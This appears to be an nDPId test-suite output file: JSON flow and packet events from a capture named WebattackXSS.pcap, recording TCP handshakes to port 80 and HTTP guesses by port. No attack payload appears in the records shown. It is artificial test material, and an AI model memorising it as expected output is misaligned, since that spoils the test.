-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3494,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1499347386737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347386737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05qFAAD4G3zasEAABwKgKMt1EAFDnQGeIQZKD2YAQAOU0PwAAAQEICgE6gSgD5FKd"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347389305,"flow_last_seen":1499347389305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347389305,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1499347389305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86AFAAD4G3c6sEAABwKgKMt1eAFBbbmurAAAAAKACchA1VwAAAgQFtAQCCAoBOoOqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1499347389305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347389305,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3V4nyHcOW25rrKAScSA+XAAAAgQFtAQCCAoD5FUfATqDqgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1499347389306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347389306,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06AJAAD4G3dWsEAABwKgKMt1eAFBbbmusJ8h3D4AQAOXdYwAAAQEICgE6g6oD5FUf"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347390580,"flow_last_seen":1499347390580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347390580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1499347390580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMt1sAFC4TAmHAAAAAKACchA5UQAAAgQFtAQCCAoBOoToAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1499347390580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347390580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Wzc2WIguEwJiKAScSCg8wAAAgQFtAQCCAoD5FZeATqE6AEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1499347390581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347390581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMt1sAFC4TAmI3NliIYAQAOU\/+gAAAQEICgE6hOkD5FZe"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347393135,"flow_last_seen":1499347393135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347393135,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1499347393135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89hRAAD4Gz7usEAABwKgKMt2GAFBIK3FzAAAAAKACchA+7QAAAgQFtAQCCAoBOodnAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1499347393135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347393135,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Yb1ZkzcSCtxdKAScSCgxwAAAgQFtAQCCAoD5FjdATqHZwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1499347393136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347393136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09hVAAD4Gz8KsEAABwKgKMt2GAFBIK3F09WZM3YAQAOU\/zwAAAQEICgE6h2cD5Fjd"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347394398,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eldAAD4GS3msEAABwKgKMt2UAFCjvfL0AAAAAKACchBgjwAAAgQFtAQCCAoBOoijAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1499347394398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347394398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3ZQ04Dogo73y9aAScSCUcAAAAgQFtAQCCAoD5FoZATqIowEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1499347394399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347394399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0elhAAD4GS4CsEAABwKgKMt2UAFCjvfL1NOA6IYAQAOUzeAAAAQEICgE6iKMD5FoZ"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347264804,"flow_last_seen":1499347270693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347266097,"flow_last_seen":1499347271692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347267376,"flow_last_seen":1499347272693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347268659,"flow_last_seen":1499347273693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347271162,"flow_last_seen":1499347276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347272469,"flow_last_seen":1499347277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347273742,"flow_last_seen":1499347279695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347394723,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347395736,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347395736,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86QJAAD4G3M2sEAABwKgKMt2iAFAP0mDzAAAAAKACchCFIAAAAgQFtAQCCAoBOonxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1499347395736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347395736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3aKdN8ZwD9Jg9KAScSDDCwAAAgQFtAQCCAoD5FtnATqJ8QEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1499347395737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347395737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06QNAAD4G3NSsEAABwKgKMt2iAFAP0mD0nTfGcYAQAOViEgAAAQEICgE6ifID5Ftn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347398258,"flow_last_seen":1499347398258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347398258,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3582,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1499347398258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RfFAAD4Gf9+sEAABwKgKMt28AFBXE8mZAAAAAKACchDSpwAAAgQFtAQCCAoBOoxoAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1499347398258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347398258,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3byK2p7LVxPJmqAScSBIHgAAAgQFtAQCCAoD5F3eATqMaAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":3,"flow_last_seen":1499347398259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347398259,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RfJAAD4Gf+asEAABwKgKMt28AFBXE8maitqezIAQAOXnJQAAAQEICgE6jGgD5F3e"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347399514,"flow_last_seen":1499347399514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347399514,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1499347399514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gr5AAD4GQxKsEAABwKgKMt3KAFDFpQ8cAAAAAKACchAdSwAAAgQFtAQCCAoBOo2iAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":1499347399514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347399514,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3cp+0BfYxaUPHaAScSAkhQAAAgQFtAQCCAoD5F8YATqNogEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":1499347399515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347399515,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gr9AAD4GQxmsEAABwKgKMt3KAFDFpQ8dftAX2YAQAOXDjAAAAQEICgE6jaID5F8Y"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347400752,"flow_last_seen":1499347400752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347400752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1499347400752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pCxAAD4GIaSsEAABwKgKMt3YAFC0oCr7AAAAAKACchARLgAAAgQFtAQCCAoBOo7XAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":2,"flow_last_seen":1499347400752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347400752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3diBtZGUtKAq\/KAScSCakQAAAgQFtAQCCAoD5GBNATqO1wEDAwc="} 
